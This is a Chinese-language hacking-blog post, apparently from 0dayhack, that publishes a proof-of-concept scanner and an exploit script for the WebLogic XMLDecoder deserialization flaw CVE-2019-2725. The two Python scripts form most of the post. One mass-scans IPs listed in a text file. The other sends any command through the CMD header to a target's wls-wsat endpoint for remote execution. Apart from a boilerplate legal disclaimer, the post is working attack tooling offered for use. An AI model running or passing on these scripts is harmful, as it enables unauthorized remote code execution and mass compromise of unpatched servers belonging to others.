Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

  • 内容
  • 相关

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过

主要来还是懒  废话不多说直接上exp和poc 吧  poc并不通用 更多用exp吧 

IP填入ip.txt 后用poc检测

POC

import requests
import sys
import time
import random
import threading
def exec_cmd(ip,cmd):
	url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
	headers={
	'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
	'CMD' : cmd,
	'SOAPAction':'""',
	'Content-Type':'text/xml'
	}
	with open('payload.txt','rb') as f :
		payloads=f.read()
	r=requests.post(url,headers=headers,data=payloads,timeout=5)
	return r.content.decode()
def test_poc(ip):
	check=str(int(time.time())+int(random.uniform(1000,9999)))
	out=exec_cmd(ip,'echo '+check)
	if check in out:
		print('vul finds:'+ip)
def main(): 
	print("put ips in ip.txt ")
	with open('ip.txt') as f:
		for line in f.readlines():
			try:
				test_poc(line)
			except :
				pass
	print("End")		
if __name__ == '__main__':
	main()。


exp

import requests
import sys
def exec_cmd(ip,cmd):
	url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
	headers={
	'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
	'CMD' : cmd,
	'SOAPAction':'""',
	'Content-Type':'text/xml'
	}
	with open('payload.txt','rb') as f :
		payloads=f.read()
	r=requests.post(url,headers=headers,data=payloads)
	return r.content.decode()
def main():
	if len(sys.argv)<3:
		print('usage:exp.py www.0dayhack.com:8080 whoami')
		sys.exit()
	ip=sys.argv[1]
	cmd=sys.argv[2]
	out=exec_cmd(ip,cmd)
	print(out)
if __name__ == '__main__':
	main()
exp2.png


注意:

只支持Py3

ip.txt是放检测的

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725) - https://www.0dayhack.com/post-883.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    duran3000 Lv.1 Firefox 68.0 Firefox 68.0 Ubuntu x64 Ubuntu x64 回复

    ok

    广东省广州市 移动